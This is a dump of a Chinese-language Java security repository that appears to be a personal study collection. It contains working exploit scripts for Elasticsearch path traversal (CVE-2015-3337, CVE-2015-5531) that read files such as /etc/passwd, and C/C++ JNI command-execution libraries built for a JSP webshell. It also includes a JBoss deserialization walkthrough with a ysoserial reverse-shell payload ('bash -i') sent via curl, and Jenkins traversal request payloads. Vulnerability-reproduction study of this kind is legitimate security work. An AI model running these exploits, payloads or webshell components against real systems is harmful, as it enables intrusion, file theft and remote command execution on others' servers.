#参考https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-3337 3 | import requests 4 | import urllib3 5 | 6 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 7 | 8 | """ 9 | 漏洞原理 10 | 在安装了具有"site"功能的插件以后,插件目录使用../即可向上跳转,导致目录穿越漏洞,可读取任意文件。 11 | 没有安装任意插件的elasticsearch不受影响。 12 | 13 | 影响版本 14 | ElasticSearch 1.4.5以下/1.5.2以下 15 | 16 | 查看所有已安装的插件:/_cat/plugins 17 | 需要满足安装elasticsearch-head扩展 18 | """ 19 | 20 | url = "http://ip" 21 | exp = "../../../../../../../../.." 
22 | filename = input("输入读的文件>>> ") 23 | r=requests.request("GET",url+"/_plugin/head/"+filename) 24 | print(r.text) 25 | -------------------------------------------------------------------------------- /Elasticsearch/ElasticSearch 目录穿越漏洞(CVE-2015-5531)/exp.py: -------------------------------------------------------------------------------- 1 | #@author Firbasky 2 | #参考https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-5531 3 | import requests 4 | import urllib3 5 | 6 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 7 | 8 | """ 9 | 漏洞原理 10 | elasticsearch 1.5.1及以前,无需任何配置即可触发该漏洞。 11 | 之后的新版,配置文件elasticsearch.yml中必须存在path.repo, 12 | 该配置值为一个目录,且该目录必须可写,等于限制了备份仓库的根位置。不配置该值,默认不启动这个功能。 13 | 14 | 影响版本 15 | ElasticSearch 1.6.1以下 16 | """ 17 | url = "http://ip" 18 | 19 | headers = {"Content-type": "application/json","Accept": "*/*"} 20 | 21 | # /_snapshot/test PUT 22 | add_Warehouse = { 23 | "type": "fs", 24 | "settings": { 25 | "location": "/usr/share/elasticsearch/repo/test" 26 | } 27 | } 28 | # PUT /_snapshot/test2 29 | add_snapshot = { 30 | "type": "fs", 31 | "settings": { 32 | "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata" 33 | } 34 | } 35 | 36 | requests.request("PUT",url=url+"/_snapshot/test",data=add_Warehouse,verify=False,headers=headers) 37 | 38 | requests.request("PUT",url=url+"/_snapshot/test",data=add_snapshot,verify=False,headers=headers) 39 | 40 | r = requests.request("GET",url=url+"/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd",verify=False,headers=headers) 41 | 42 | print(r.text) 43 | -------------------------------------------------------------------------------- /Elasticsearch/Elasticsearch写入webshell漏洞(WooYun-2015-110216)/exp.py: -------------------------------------------------------------------------------- 1 | #https://github.com/vulhub/vulhub/tree/master/elasticsearch/WooYun-2015-110216 2 | 
-------------------------------------------------------------------------------- /Elasticsearch/README.md: -------------------------------------------------------------------------------- 1 | ## Elasticsearch简介 2 | 3 | Elasticsearch是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTful web接口。Elasticsearch是用Java语言开发的,并作为Apache许可条款下的开放源码发布,是一种流行的企业级搜索引擎。 4 | 5 | Elasticsearch用于云计算中,能够达到实时搜索,稳定,可靠,快速,安装使用方便。官方客户端在Java、.NET(C#)、PHP、Python、Apache Groovy、Ruby和许多其他语言中都是可用的。根据DB-Engines的排名显示,Elasticsearch是最受欢迎的企业搜索引擎,其次是`Apache Solr`,也是基于Lucene。由于Elasticsearch的功能强大和使用简单,维基百科、卫报、Stack Overflow、GitHub等都纷纷采用它来做搜索。现在,Elasticsearch已成为全文搜索领域的主流软件之一。 6 | -------------------------------------------------------------------------------- /JNI/Readme.md: -------------------------------------------------------------------------------- 1 | # JNI 2 | 3 | **通过System.load(path) 去加载dll文件不要求后缀名,可以为任意的后缀名,只要能找到路径。** 4 | -------------------------------------------------------------------------------- /JNI/jni.iml: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /JNI/jni/cmd.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/JNI/jni/cmd.dll -------------------------------------------------------------------------------- /JNI/jni/jni_md.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1996, 1998, Oracle and/or its affiliates. All rights reserved. 3 | * ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms. 
4 | * 5 | * 6 | * 7 | * 8 | * 9 | * 10 | * 11 | * 12 | * 13 | * 14 | * 15 | * 16 | * 17 | * 18 | * 19 | * 20 | * 21 | * 22 | * 23 | * 24 | */ 25 | 26 | #ifndef _JAVASOFT_JNI_MD_H_ 27 | #define _JAVASOFT_JNI_MD_H_ 28 | 29 | #define JNIEXPORT __declspec(dllexport) 30 | #define JNIIMPORT __declspec(dllimport) 31 | #define JNICALL __stdcall 32 | 33 | typedef long jint; 34 | typedef __int64 jlong; 35 | typedef signed char jbyte; 36 | 37 | #endif /* !_JAVASOFT_JNI_MD_H_ */ 38 | -------------------------------------------------------------------------------- /JNI/jni/org_javaweb_jni_CommandExecution.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "org_javaweb_jni_CommandExecution.h" 6 | 7 | using namespace std; 8 | 9 | JNIEXPORT jstring 10 | 11 | JNICALL Java_org_javaweb_jni_CommandExecution_exec 12 | (JNIEnv *env, jclass jclass, jstring str) { 13 | if (str != NULL) { 14 | jboolean jsCopy; 15 | const char *cmd = env->GetStringUTFChars(str, &jsCopy);// 将jstring参数转成char指针 16 | FILE *fd = popen(cmd, "r");// 使用popen函数执行系统命令 17 | if (fd != NULL) { 18 | string result; // 返回结果字符串 19 | char buf[128];// 定义字符串数组 20 | while (fgets(buf, sizeof(buf), fd) != NULL) { // 读取popen函数的执行结果 21 | result +=buf; // 拼接读取到的结果到result 22 | } 23 | pclose(fd);// 关闭popen 24 | return env->NewStringUTF(result.c_str());// 返回命令执行结果给Java 25 | } 26 | } 27 | return NULL; 28 | } -------------------------------------------------------------------------------- /JNI/jni/org_javaweb_jni_CommandExecution.h: -------------------------------------------------------------------------------- 1 | /* DO NOT EDIT THIS FILE - it is machine generated */ 2 | #include 3 | /* Header for class org_javaweb_jni_CommandExecution */ 4 | 5 | #ifndef _Included_org_javaweb_jni_CommandExecution 6 | #define _Included_org_javaweb_jni_CommandExecution 7 | #ifdef __cplusplus 8 | extern "C" { 9 | #endif 10 | /* 11 | * Class: 
org_javaweb_jni_CommandExecution 12 | * Method: exec 13 | * Signature: (Ljava/lang/String;)Ljava/lang/String; 14 | */ 15 | JNIEXPORT jstring JNICALL Java_org_javaweb_jni_CommandExecution_exec 16 | (JNIEnv *, jclass, jstring); 17 | 18 | #ifdef __cplusplus 19 | } 20 | #endif 21 | #endif 22 | -------------------------------------------------------------------------------- /JNI/jni/webshell/jni_md.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1996, 1998, Oracle and/or its affiliates. All rights reserved. 3 | * ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms. 4 | * 5 | * 6 | * 7 | * 8 | * 9 | * 10 | * 11 | * 12 | * 13 | * 14 | * 15 | * 16 | * 17 | * 18 | * 19 | * 20 | * 21 | * 22 | * 23 | * 24 | */ 25 | 26 | #ifndef _JAVASOFT_JNI_MD_H_ 27 | #define _JAVASOFT_JNI_MD_H_ 28 | 29 | #define JNIEXPORT __declspec(dllexport) 30 | #define JNIIMPORT __declspec(dllimport) 31 | #define JNICALL __stdcall 32 | 33 | typedef long jint; 34 | typedef __int64 jlong; 35 | typedef signed char jbyte; 36 | 37 | #endif /* !_JAVASOFT_JNI_MD_H_ */ 38 | -------------------------------------------------------------------------------- /JNI/jni/webshell/libtest.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/JNI/jni/webshell/libtest.dll -------------------------------------------------------------------------------- /JNI/jni/webshell/org_apache_jsp_test_jsp.h: -------------------------------------------------------------------------------- 1 | /* DO NOT EDIT THIS FILE - it is machine generated */ 2 | #include 3 | /* Header for class org_apache_jsp_test_jsp */ 4 | 5 | #ifndef _Included_org_apache_jsp_test_jsp 6 | #define _Included_org_apache_jsp_test_jsp 7 | #ifdef __cplusplus 8 | extern "C" { 9 | #endif 10 | #ifdef __cplusplus 11 | } 12 | #endif 13 | #endif 14 | 
-------------------------------------------------------------------------------- /JNI/jni/webshell/org_apache_jsp_test_jsp_JniClass.c: -------------------------------------------------------------------------------- 1 | #include "jni.h" 2 | #include "org_apache_jsp_test_jsp_JniClass.h" 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | int execmd(const char *cmd, char *result) 10 | { 11 | char buffer[1024*12]; //定义缓冲区 12 | FILE *pipe = _popen(cmd, "r"); //打开管道,并执行命令 13 | if (!pipe) 14 | return 0; //返回0表示运行失败 15 | 16 | while (!feof(pipe)) 17 | { 18 | if (fgets(buffer, 128, pipe)) 19 | { //将管道输出到result中 20 | strcat(result, buffer); 21 | } 22 | } 23 | _pclose(pipe); //关闭管道 24 | return 1; //返回1表示运行成功 25 | } 26 | JNIEXPORT jstring JNICALL Java_org_apache_jsp_test_1jsp_00024JniClass_exec(JNIEnv *env, jobject class_object, jstring jstr) 27 | { 28 | const char *cstr = (*env)->GetStringUTFChars(env, jstr, NULL); 29 | char result[1024 * 12] = ""; //定义存放结果的字符串数组 30 | if (1 == execmd(cstr, result)) 31 | { 32 | // printf(result); 33 | } 34 | char return_messge[100] = ""; 35 | strcat(return_messge, result); 36 | jstring cmdresult = (*env)->NewStringUTF(env, return_messge); 37 | //system(); 38 | return cmdresult; 39 | } -------------------------------------------------------------------------------- /JNI/jni/webshell/org_apache_jsp_test_jsp_JniClass.h: -------------------------------------------------------------------------------- 1 | /* DO NOT EDIT THIS FILE - it is machine generated */ 2 | #include "jni.h" 3 | /* Header for class org_apache_jsp_test_jsp_JniClass */ 4 | 5 | #ifndef _Included_org_apache_jsp_test_jsp_JniClass 6 | #define _Included_org_apache_jsp_test_jsp_JniClass 7 | #ifdef __cplusplus 8 | extern "C" { 9 | #endif 10 | /* 11 | * Class: org_apache_jsp_test_jsp_JniClass 12 | * Method: exec 13 | * Signature: (Ljava/lang/String;)Ljava/lang/String; 14 | */ 15 | JNIEXPORT jstring JNICALL Java_org_apache_jsp_test_1jsp_00024JniClass_exec 16 | (JNIEnv 
*, jobject, jstring); 17 | 18 | #ifdef __cplusplus 19 | } 20 | #endif 21 | #endif 22 | -------------------------------------------------------------------------------- /JNI/jni/webshell/命令.txt: -------------------------------------------------------------------------------- 1 | gcc org_apache_jsp_test_jsp_JniClass.c -shared -fPIC -o libtest.dll -------------------------------------------------------------------------------- /JNI/jni/命令.txt: -------------------------------------------------------------------------------- 1 | x86_64-w64-mingw32-g++ -I"%JAVA_HOME%\include" -I"%JAVA_HOME%\include\win32" -shared -o cmd.dll org_javaweb_jni_CommandExecution.cpp 2 | 3 | https://javaweb.org/?p=1866 4 | https://blog.csdn.net/williamgavin/article/details/83867408 5 | https://www3.ntu.edu.sg/home/ehchua/programming/java/JavaNativeInterface.html -------------------------------------------------------------------------------- /JNI/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | org.example 8 | jni 9 | 1.0-SNAPSHOT 10 | 11 | 12 | 8 13 | 8 14 | 15 | 16 | -------------------------------------------------------------------------------- /JNI/src/main/java/org/apache/jsp/test_jsp.java: -------------------------------------------------------------------------------- 1 | package org.apache.jsp; 2 | 3 | public class test_jsp 4 | { 5 | class JniClass 6 | { 7 | public native String exec( String cmd ); 8 | } 9 | static { 10 | System.setProperty("java.library.path","D:\\library\\"); 11 | System.loadLibrary("libtest"); 12 | // System.loadLibrary("cmd"); 13 | } 14 | 15 | public static void main(String[] args)throws Exception { 16 | test_jsp test_jsp = new test_jsp(); 17 | org.apache.jsp.test_jsp.JniClass jniClass = test_jsp.new JniClass(); 18 | jniClass.exec("calc"); 19 | // System.out.println((File.separatorChar)); 20 | } 21 | } -------------------------------------------------------------------------------- 
/JNI/src/main/java/org/javaweb/jni/CommandExecution.java: -------------------------------------------------------------------------------- 1 | package org.javaweb.jni; 2 | 3 | import java.io.File; 4 | 5 | public class CommandExecution { 6 | 7 | static { 8 | System.setProperty("java.library.path","D:\\library\\"); 9 | System.loadLibrary("cmd"); 10 | // System.loadLibrary("cmd"); 11 | } 12 | public static native String exec(String cmd); 13 | 14 | public static void main(String[] args) { 15 | exec("calc"); 16 | // System.out.println((File.separatorChar)); 17 | } 18 | } -------------------------------------------------------------------------------- /JNI/src/main/java/org/javaweb/jni/CommandExecutionTest.java: -------------------------------------------------------------------------------- 1 | package org.javaweb.jni; 2 | 3 | import java.io.File; 4 | import java.lang.reflect.Method; 5 | 6 | public class CommandExecutionTest { 7 | public static void main(String[] args) { 8 | cmd("calc"); 9 | } 10 | public static void cmd(String cmd){ 11 | try { 12 | ClassLoader loader = new ClassLoader(CommandExecutionTest.class.getClassLoader()){}; 13 | // 测试时候换成自己编译好的dll路径 14 | File libPath = new File("E:\\java安全\\jni\\jni\\cmd.dll"); 15 | // 加载命令执行类 16 | Class commandClass = loader.loadClass("org.javaweb.jni.CommandExecution"); 17 | // 可以用System.load也加载lib也可以用反射ClassLoader加载,如果loadLibrary0 18 | Method loadLibrary0Method = ClassLoader.class.getDeclaredMethod("loadLibrary0", Class.class, File.class); 19 | loadLibrary0Method.setAccessible(true); 20 | loadLibrary0Method.invoke(loader, commandClass, libPath); 21 | String content = (String) commandClass.getMethod("exec", String.class).invoke(null, cmd); 22 | System.out.println(content); 23 | } catch (Exception e) { 24 | e.printStackTrace(); 25 | } 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /JNI/target/classes/org/apache/jsp/test_jsp$JniClass.class: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/JNI/target/classes/org/apache/jsp/test_jsp$JniClass.class -------------------------------------------------------------------------------- /JNI/target/classes/org/apache/jsp/test_jsp.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/JNI/target/classes/org/apache/jsp/test_jsp.class -------------------------------------------------------------------------------- /JNI/target/classes/org/javaweb/jni/CommandExecution.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/JNI/target/classes/org/javaweb/jni/CommandExecution.class -------------------------------------------------------------------------------- /JNI/target/classes/org/javaweb/jni/CommandExecutionTest$1.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/JNI/target/classes/org/javaweb/jni/CommandExecutionTest$1.class -------------------------------------------------------------------------------- /JNI/target/classes/org/javaweb/jni/CommandExecutionTest.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/JNI/target/classes/org/javaweb/jni/CommandExecutionTest.class -------------------------------------------------------------------------------- /JNI/wz.txt: -------------------------------------------------------------------------------- 1 | https://javaweb.org/?p=1866 -------------------------------------------------------------------------------- 
/Jboss/CVE-2017-12149/README.md: -------------------------------------------------------------------------------- 1 | # JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149) 2 | 3 | ## 漏洞介绍: 4 | 5 | 该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。 6 | 7 | ## 漏洞分析: 8 | 9 | 该漏洞出现在`/invoker/readonly`请求中,服务器将用户提交的POST内容进行了Java反序列化: 10 | 11 | ![image-20210401130731439](image-20210401130731439.png) 12 | 13 | ## 漏洞复现: 14 | 15 | java 反弹shell 16 | http://www.jackson-t.ca/runtime-exec-payloads.html 17 | 18 | **生成exp** 19 | 20 | ``` 21 | java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,xxxxx}|{base64,-d}|{bash,-i}" > poc.ser 22 | ``` 23 | 24 | **通过curl发送** 25 | 26 | ```curl 27 | curl http://xxxx:8080/invoker/readonly --data-binary @poc.ser 28 | ``` 29 | 30 | -------------------------------------------------------------------------------- /Jboss/CVE-2017-12149/image-20210401130731439.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Jboss/CVE-2017-12149/image-20210401130731439.png -------------------------------------------------------------------------------- /Jboss/CVE-2017-7504/README.md: -------------------------------------------------------------------------------- 1 | # JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504) 2 | 3 | Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 4 | 5 | ## 利用思路 6 | 7 | 基本上和CVE-2017-12149差不多,只不过利用的路由: `/jbossmq-httpil/HTTPServerILServlet` 8 | -------------------------------------------------------------------------------- /Jboss/JMXInvokerServlet-deserialization/README.md: -------------------------------------------------------------------------------- 1 | # JBoss JMXInvokerServlet 反序列化漏洞 2 | 3 | 
这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。 4 | 5 | **利用思路和CVE-2017-12149 差不多** 6 | -------------------------------------------------------------------------------- /Jboss/README.md: -------------------------------------------------------------------------------- 1 | ## jboss介绍: 2 | 3 | JBoss 是一个基于J2EE的[开放源代码](https://baike.baidu.com/item/开放源代码/114160)的[应用服务器](https://baike.baidu.com/item/应用服务器/4971773)。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。 4 | 5 | 自己测试了网上很多工具发现不是特别好用 而且不集中。。。。 6 | 所以自己想写一个综合利用的工具。。。 7 | -------------------------------------------------------------------------------- /Jdbc/CVE-2021-2471/img/image-20211022135316052.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Jdbc/CVE-2021-2471/img/image-20211022135316052.png -------------------------------------------------------------------------------- /Jdbc/CVE-2021-2471/img/image-20211022135425801.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Jdbc/CVE-2021-2471/img/image-20211022135425801.png -------------------------------------------------------------------------------- /Jdbc/CVE-2021-2471/img/image-20211022140911655.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Jdbc/CVE-2021-2471/img/image-20211022140911655.png -------------------------------------------------------------------------------- /Jdbc/CVE-2021-2471/img/image-20211022141357429.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Jdbc/CVE-2021-2471/img/image-20211022141357429.png -------------------------------------------------------------------------------- /Jdbc/CVE-2021-2471/img/image-20211022141453082.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Jdbc/CVE-2021-2471/img/image-20211022141453082.png -------------------------------------------------------------------------------- /Jdbc/CVE-2021-2471/img/image-20211022141712911.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Jdbc/CVE-2021-2471/img/image-20211022141712911.png -------------------------------------------------------------------------------- /Jdbc/CVE-2021-2471/img/image-20211022142111106.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Jdbc/CVE-2021-2471/img/image-20211022142111106.png -------------------------------------------------------------------------------- /Jdbc/CVE-2021-2471/img/image-20211022142331574.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Jdbc/CVE-2021-2471/img/image-20211022142331574.png -------------------------------------------------------------------------------- /Jdbc/Readme.md: -------------------------------------------------------------------------------- 1 | # Jdbc 2 | >JDBC(Java DataBase Connectivity)是Java和数据库之间的一个桥梁,是一个 规范 而不是一个实现,能够执行SQL语句。它由一组用Java语言编写的类和接口组成。各种不同类型的数据库都有相应的实现。 3 | 4 | + MySQL JDBC 客户端反序列化漏洞[参考文章](https://xz.aliyun.com/t/8159) [自己调试的漏洞点](./img/1.png) 
[自己调试的漏洞点](./img/2.png)**简单的说:在JDBC连接MySQL的过程中,执行了SHOW SESSION STATUS语句。而如果我们控制返回的结果是一个恶意的对象,jdbc就会去执行readobject方法反序列化,从而有入口点,再利用cc链,完美rce。** 5 | -------------------------------------------------------------------------------- /Jdbc/img/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Jdbc/img/1.png -------------------------------------------------------------------------------- /Jdbc/img/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Jdbc/img/2.png -------------------------------------------------------------------------------- /Jdbc/img/Readme.md: -------------------------------------------------------------------------------- 1 | # 照片 2 | -------------------------------------------------------------------------------- /Jenkins/Readme.md: -------------------------------------------------------------------------------- 1 | # Jenkins 2 | 3 | ## CVE-2018-1999002 4 | poc 5 | ``` 6 | GET /plugin/credentials/.ini HTTP/1.1 7 | Host: 8 | Accept-Language: ../../../../../../../../windows/win 9 | 10 | GET /plugin/credentials/.txt HTTP/1.1 11 | Host: 12 | Accept-Language: ../../../../../../../../firebasky 13 | ``` 14 | 15 | [Jenkins 任意文件读取漏洞复现与分析-CVE-2018-1999002](https://chybeta.github.io/2018/08/07/Jenkins-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E4%B8%8E%E5%88%86%E6%9E%90-%E3%80%90CVE-2018-1999002%E3%80%91/) 16 | 17 | linux 下利用难度大 必须找一个存在`_`的目录 18 | 19 | 20 | 21 | 22 | ## 插件问题 xxe/xstream 反序列化 23 | https://github.com/Firebasky/ctf-Challenge/tree/main/2021_xyb_easyJenkins 24 | -------------------------------------------------------------------------------- /MyBatis/Readme.md: -------------------------------------------------------------------------------- 1 | # MyBatis 2 
| 3 | + [CVE-2020-26945 mybatis二级缓存反序列化的分析与复现](https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&mid=2247484196&idx=1&sn=735666b28cff6e6552d8f3e16b1be9a5&chksm=fa8b1ebccdfc97aa80b6103587fd418b63c6b0d290cd4229ccc999b3706fe4f325595049a7ce&mpshare=1&scene=23&srcid=1013pFDy9OUsVb24733hEAhA&sharer_sharetime=1602582161965&sharer_shareid=8a8448ee03016e30de742559b7359a01%23rd) 简单的说就是mybatis为了缓解多次查询而开启的缓存,如果可以修改缓存的内容就可以将其反序列化。[CVE-2020-26945漏洞](https://www.anquanke.com/post/id/219457) 4 | -------------------------------------------------------------------------------- /RASP/Readme.md: -------------------------------------------------------------------------------- 1 | # RASP 2 | 3 | Runtime application self-protection 4 | 5 | 它是一种新型应用安全保护技术,它将保护程序像疫苗一样注入到应用程序中,与应用程序融为一体,能实时检测和阻断安全攻击,使应用程序具备自我保护能力,当应用程序遭受到实际攻击伤害,就可以自动对其进行防御,而不需要进行人工干预。 6 | 7 | 8 | 9 | RASP技术可以快速的将安全防御功能整合到正在运行的应用程序中,它拦截从应用程序到系统的所有调用,确保它们是安全的,并直接在应用程序内验证数据请求。Web和非Web应用程序都可以通过RASP进行保护。该技术不会影响应用程序的设计,因为RASP的检测和保护功能是在应用程序运行的系统上运行的。 10 | 11 | ### 使用 12 | 13 | https://github.com/baidu/openrasp 14 | 15 | 安装:java -jar RaspInstall.jar -install tomcat目录 16 | 17 | 配置环境变量: 新建 CATALINA_HOME 值为tomcat目录 18 | 19 | 在tomcat目录的bin下执行catalina.bat run 20 | 21 | 测试curl -v 127.0.0.1:8888 |grep OpenRASP 22 | 23 | 服务器的响应 X-Protected-By: OpenRASP 24 | 25 | ### 测试 26 | 27 | https://github.com/baidu-security/openrasp-testcases 28 | 29 | 日志:\rasp\logs\alarm\alarm.log 30 | 31 | ### 实现 32 | 33 | java中是通过Java Agent方式进行实现 34 | 35 | **是通过java的agent配合asm对运行的字节码进行了修改,这样就达到了埋点hook的目的。** 36 | 37 | PHP是通过开发php扩展库来进行实现。 38 | 39 | .NET是通过IHostingStartup(承载启动)实现 40 | 41 | 42 | 43 | **RASP技术其实主要就是对编程语言的危险底层函数进行hook**,毕竟再怎么编码转换以及调用,最后肯定会去执行最底层的某个方法然后对系统进行调用。由此可以反推出其hook点,然后使用不同的编程语言中不同的技术对其进行实现。 44 | 45 | 46 | 47 | ### 待学习 48 | 49 | https://www.freebuf.com/articles/web/197823.html 50 | 51 | https://paper.seebug.org/1041/ 52 | 53 | https://blog.csdn.net/u011721501/article/details/74990346 54 | 55 | https://paper.seebug.org/330/ 56 | 57 | 58 | 
-------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Java 2 | 可能有一部分是java的基础语法 3 | 和一些java安全,主要是java安全和java框架漏洞的复现,加一些代码审计 4 | 5 | + 2021/7/30 [添加了java的一些命令执行shell](shell) 💛 💙 💜 ❤️ 💚 6 | + 2021/8/15 [添加了Java日常知识点](java日常) 💛 💙 💜 ❤️ 💚 7 | + 2021/8/31 [添加了jackson序列化的exp](jackson) 💛 💙 💜 ❤️ 💚 8 | + 2021/9/06 [添加Shiro其他漏洞](Shiro) 💛 💙 💜 ❤️ 💚 9 | + 2021/9/06 [添加SnakeYaml序列化漏洞和trick](SnakeYaml) 💛 💙 💜 ❤️ 💚 10 | + 2021/9/08 [添加序列化链](java序列化链) 💛 💙 💜 ❤️ 💚 11 | + 2021/9/15 [添加java模板注入](java模板注入) 💛 💙 💜 ❤️ 💚 12 | + 2021/9/18 [添加java小型框架](java小型框架) 💛 💙 💜 ❤️ 💚 **添加了渗透的思路** 13 | + 2021/9/25 [添加java回显](java回显) 💛 💙 💜 ❤️ 💚 14 | + 2021/10/3 [添加Weblogic漏洞](Weblogic) 💛 💙 💜 ❤️ 💚 15 | + 2021/10/15 [添加MyBatis的CVE-2020-26945](MyBatis) 💛 💙 💜 ❤️ 💚 16 | + 2021/10/20 [添加BypassSM](BypassSM) 💛 💙 💜 ❤️ 💚 17 | + 2021/10/25 [添加Xstream](Xstream) 💛 💙 💜 ❤️ 💚 18 | + 2021/11/19 [添加Springboot](Springboot) 💛 💙 💜 ❤️ 💚 19 | + 2021/12/17 [添加Springcloud](Springcolud) 💛 💙 💜 ❤️ 💚 20 | + 2021/12/17 [添加Jdbc](Jdbc) 💛 💙 💜 ❤️ 💚 21 | + 2021/12/19 [添加Jenkins](Jenkins) 💛 💙 💜 ❤️ 💚 22 | 23 | 24 | 25 | ## 待学习 26 | 27 | [java设计模式](https://www.runoob.com/design-pattern/design-pattern-tutorial.html) 28 | 29 | 30 | 31 | ## 小记录 32 | 2021/12/21更新 33 | 34 | 项目100star啦~~~~~~~~ 35 | 36 | 37 | ## Stargazers over time 38 | 39 | [![Stargazers over time](https://starchart.cc/Firebasky/Java.svg)](https://starchart.cc/Firebasky/Java) 40 | 41 | -------------------------------------------------------------------------------- /Shiro/CVE-2020-1957.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/CVE-2020-1957.pdf -------------------------------------------------------------------------------- /Shiro/README.md: -------------------------------------------------------------------------------- 1 
| # 关于java框架的Shiro的一些漏洞分析 2 | 3 | + [shiro550目录是Shiro漏洞环境并且自己写了一个扫描shirokey的工具](./shiro550) 4 | + [shiro权限绕过](./Shiro权限绕过/Readme.md) 5 | + [shiro721](./shiro721) [padding oracle和cbc翻转攻击](https://skysec.top/2017/12/13/padding-oracle%E5%92%8Ccbc%E7%BF%BB%E8%BD%AC%E6%94%BB%E5%87%BB/) 6 | -------------------------------------------------------------------------------- /Shiro/Shiro权限绕过/HELP.md: -------------------------------------------------------------------------------- 1 | # Getting Started 2 | 3 | ### Reference Documentation 4 | 5 | For further reference, please consider the following sections: 6 | 7 | * [Official Apache Maven documentation](https://maven.apache.org/guides/index.html) 8 | * [Spring Boot Maven Plugin Reference Guide](https://docs.spring.io/spring-boot/docs/2.5.4/maven-plugin/reference/html/) 9 | * [Create an OCI image](https://docs.spring.io/spring-boot/docs/2.5.4/maven-plugin/reference/html/#build-image) 10 | * [Spring Web](https://docs.spring.io/spring-boot/docs/2.5.4/reference/htmlsingle/#boot-features-developing-web-applications) 11 | 12 | ### Guides 13 | 14 | The following guides illustrate how to use some features concretely: 15 | 16 | * [Building a RESTful Web Service](https://spring.io/guides/gs/rest-service/) 17 | * [Serving Web Content with Spring MVC](https://spring.io/guides/gs/serving-web-content/) 18 | * [Building REST services with Spring](https://spring.io/guides/tutorials/bookmarks/) 19 | 20 | -------------------------------------------------------------------------------- /Shiro/Shiro权限绕过/src/main/java/com/shiro/vuln/Shiro/MainRealm.java: -------------------------------------------------------------------------------- 1 | 2 | package com.shiro.vuln.Shiro; 3 | 4 | import org.apache.shiro.authc.*; 5 | import 